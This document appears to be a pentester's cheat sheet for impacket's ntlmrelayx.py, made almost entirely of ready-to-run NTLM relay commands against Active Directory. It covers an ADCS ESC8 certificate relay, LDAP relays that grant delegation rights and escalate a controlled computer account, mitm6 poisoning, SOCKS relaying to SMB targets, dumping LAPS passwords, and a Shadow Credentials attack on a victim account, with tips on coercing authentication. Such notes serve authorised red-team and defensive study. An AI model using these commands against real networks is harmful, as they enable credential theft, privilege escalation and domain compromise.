#
ntlmrelayx.py
ntlmrelay is part of impacket.
#
Logging output
ntlmrelayx YOUR-COMMANDS --output-file output.logNeed to revisit this - I think this only captures hashes
#
Relaying with ADCS ESC8 attack
ntlmrelayx -t http://ca.domain.com/certsrv/certfnsh.asp -smb2support --adcs -debug --template 'DomainController'
#
Escalate privileges via relay
If you've already added a computer record to the environment (using something like powermad), you may be able relay to LDAP and assign escalated privileges to that computer object! For example:
ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$Then, if you've found a system running WebClient, you could potentially coerce authentication to a DNS record you've added and pull off the privesc!
#
Delegate access attack while poisoning with mitm6
ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access
#
Setup SOCKS relay to a list of hosts
In this example we have a targets.txt file full of entries like this:
smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6We setup the SOCKS relay like so:
ntlmrelayx.py -tf targets.txt -smb2support -socks
#
Dumping LAPS passwords
If you want to just setup a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and just specify you want to dump LAPS passwords:
ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps
#
Shadow Credentials attack
My favorite write-up on this attack is probably this one from GuidePoint security
#
Find hosts with WebClient running
The webclientservicescanner works well for this.
#
Add a rogue DNS record pointing to your machine
Try dnstool.py for this.
#
Setup relay for the Shadow Credentials attack
ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da
#
Trigger HTTP auth from VICTIMS
Head to our coercer page for more info.